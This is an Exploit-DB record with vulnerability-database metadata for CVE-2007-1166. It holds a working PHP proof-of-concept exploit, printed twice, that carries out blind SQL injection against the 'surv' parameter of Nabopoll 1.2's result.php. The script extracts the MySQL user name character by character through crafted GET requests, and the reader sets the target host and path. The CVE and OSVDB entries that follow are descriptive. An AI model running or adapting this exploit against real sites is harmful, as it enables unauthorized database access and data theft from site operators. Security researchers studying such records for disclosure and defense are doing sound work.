ID EDB-ID:3355
Type exploitdb
Reporter s0cratex
Modified 2007-02-21T00:00:00
Description
Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit. CVE-2007-1166. Webapps exploit for php platform
<?
# Nabopoll Blind SQL Injection P0C Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com
error_reporting(0);
ini_set("max_execution_time",0);
// just change the default values...
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; //you can verify the number entering in the site and viewing the results...
echo "==================================================\n";
echo "Nabopoll SQL Injection -- Proof of Concept Exploit\n";
echo "--------------------------------------------------\n\n";
echo " -- MySQL User: ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl = "/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),".$j.",1))=".$x."),1,0)))/*";
$cnx = fsockopen($srv,$port);
fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n");
while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
?>
# milw0rm.com [2007-02-21]
{"id": "EDB-ID:3355", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Nabopoll 1.2 result.php surv Remote Blind SQL Injection Exploit", "description": "Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit. CVE-2007-1166. Webapps exploit for php platform", "published": "2007-02-21T00:00:00", "modified": "2007-02-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3355/", "reporter": "s0cratex", "references": [], "cvelist": ["CVE-2007-1166"], "lastseen": "2016-01-31T18:17:34", "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-01-31T18:17:34", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1166"]}, {"type": "osvdb", "idList": ["OSVDB:33753"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7271"]}], "modified": "2016-01-31T18:17:34", "rev": 2}, "vulnersScore": 7.5}, "sourceHref": "https://www.exploit-db.com/download/3355/", "sourceData": "<?\n# Nabopoll Blind SQL Injection P0C Exploit\n# Download: www.nabocorp.com/nabopoll/\n# coded by s0cratex\n# Contact: s0cratex@hotmail.com\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\n\n// just change the default values...\n$srv = \"localhost\"; $path = \"/poll\"; $port = 80;\n$survey = \"8\"; //you can verify the number entering in the site and viewing the results...\n\necho \"==================================================\\n\";\necho \"Nabopoll SQL Injection -- Proof of Concept Exploit\\n\";\necho \"--------------------------------------------------\\n\\n\";\necho \" -- MySQL User: \";\n$j = 1; $user = \"\";\nwhile(!strstr($user,chr(0))){\nfor($x=0;$x<255;$x++){\n$xpl = \"/result.php?surv=\".$survey.\"/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),\".$j.\",1))=\".$x.\"),1,0)))/*\";\n$cnx = fsockopen($srv,$port);\nfwrite($cnx,\"GET \".$path.$xpl.\" HTTP/1.0\\r\\n\\r\\n\");\nwhile(!feof($cnx)){ if(ereg(\"power\",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }\nfclose($cnx);\nif ($x==255) {\ndie(\"\\n Try again...\");\n}\n}\n$j++;\n}\necho \"\\n\";\n?>\n\n# milw0rm.com [2007-02-21]\n", "osvdbidlist": ["33753"]}
{"cve": [{"lastseen": "2020-10-03T11:45:50", "description": "SQL injection vulnerability in result.php in Nabopoll 1.2 allows remote attackers to execute arbitrary SQL commands via the surv parameter.", "edition": 3, "cvss3": {}, "published": "2007-03-02T21:18:00", "title": "CVE-2007-1166", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1166"], "modified": "2018-10-16T16:37:00", "cpe": ["cpe:/a:nabocorp:nabopoll:1.2"], "id": "CVE-2007-1166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1166", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nabocorp:nabopoll:1.2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-1166"], "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0392.html\nMail List Post: http://attrition.org/pipermail/vim/2007-February/001379.html\nMail List Post: http://attrition.org/pipermail/vim/2007-February/001380.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3355\n[CVE-2007-1166](https://vulners.com/cve/CVE-2007-1166)\nBugtraq ID: 22649\n", "edition": 1, "modified": "2007-02-21T07:06:23", "published": "2007-02-21T07:06:23", "href": "https://vulners.com/osvdb/OSVDB:33753", "id": "OSVDB:33753", "title": "Nabopoll result.php surv Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-1053", "CVE-2007-1061", "CVE-2007-1032", "CVE-2007-1166", "CVE-2007-1035", "CVE-2007-1033", "CVE-2007-1028", "CVE-2007-1161"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2007-02-21T00:00:00", "published": "2007-02-21T00:00:00", "id": "SECURITYVULNS:VULN:7271", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7271", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
